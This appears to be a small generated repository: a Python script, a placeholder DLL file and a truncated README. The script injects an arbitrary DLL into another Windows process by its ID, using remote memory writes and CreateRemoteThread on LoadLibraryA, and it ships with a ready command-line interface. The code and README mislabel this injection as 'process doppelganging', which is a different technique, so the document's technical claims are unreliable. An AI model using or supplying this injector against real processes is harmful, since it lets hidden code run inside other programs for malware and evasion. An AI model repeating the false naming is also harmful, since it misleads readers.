[
    {
        "file_name": "process_doppelganger.py",
        "file_content": "import ctypes\nimport os\nimport sys\nimport win32api\nimport win32process\nimport win32con\n\n# Function to create a process doppelganger\ndef create_process_doppelganger(target_process_id, dll_path):\n    \"\"\"\n    Creates a process doppelganger by injecting a DLL into the target process.\n\n    :param target_process_id: The ID of the target process.\n    :param dll_path: The path to the DLL to inject.\n    \"\"\"\n    # Open the target process\n    target_process_handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, False, target_process_id)\n    if not target_process_handle:\n        raise Exception(f\"Failed to open target process with ID {target_process_id}\")\n\n    # Allocate memory in the target process for the DLL path\n    dll_path_bytes = dll_path.encode('utf-8')\n    dll_path_ptr = ctypes.windll.kernel32.VirtualAllocEx(target_process_handle, 0, len(dll_path_bytes), win32con.MEM_COMMIT, win32con.PAGE_READWRITE)\n    if not dll_path_ptr:\n        raise Exception(\"Failed to allocate memory in the target process\")\n\n    # Write the DLL path to the allocated memory\n    written_bytes = ctypes.windll.kernel32.WriteProcessMemory(target_process_handle, dll_path_ptr, dll_path_bytes, len(dll_path_bytes), None)\n    if not written_bytes:\n        raise Exception(\"Failed to write DLL path to the target process memory\")\n\n    # Create a remote thread in the target process to load the DLL\n    thread_id = ctypes.windll.kernel32.CreateRemoteThread(target_process_handle, None, 0, ctypes.windll.kernel32.GetProcAddress(ctypes.windll.kernel32.GetModuleHandleW('kernel32.dll'), b'LoadLibraryA'), dll_path_ptr, 0, None)\n    if not thread_id:\n        raise Exception(\"Failed to create remote thread in the target process\")\n\n    print(f\"DLL injected into process ID {target_process_id}\")\n\n# Main function to demonstrate process doppelganging\nif __name__ == \"__main__\":\n    if len(sys.argv) != 3:\n        print(\"Usage: python process_doppelganger.py <target_process_id> <dll_path>\")\n        sys.exit(1)\n\n    target_process_id = int(sys.argv[1])\n    dll_path = sys.argv[2]\n\n    create_process_doppelganger(target_process_id, dll_path)"
    },
    {
        "file_name": "example_dll.dll",
        "file_content": "# This file represents the DLL that will be injected into the target process.\n# The actual DLL content would be compiled code, but for demonstration, we'll assume it's a simple DLL with an export function.\n\n# Example content of example_dll.dll:\n# __declspec(dllexport) void ExampleFunction() {\n#     MessageBoxA(NULL, \"DLL Loaded!\", \"Success\", MB_OK);\n# }"
    },
    {
        "file_name": "README.md",
        "file_content": "# Process Doppelganger Example\n\nThis repository demonstrates how to implement process doppelganging in Python by injecting a DLL into a target process.\n\n## Requirements\n\n- Python 3.x\n- pywin32 library\n\n## Usage\n\n1. Compile `example_dll.dll` with the desired functionality.\n2. Run the `process_doppelganger.py` script with the target process ID and the path to the DLL:"
    }
]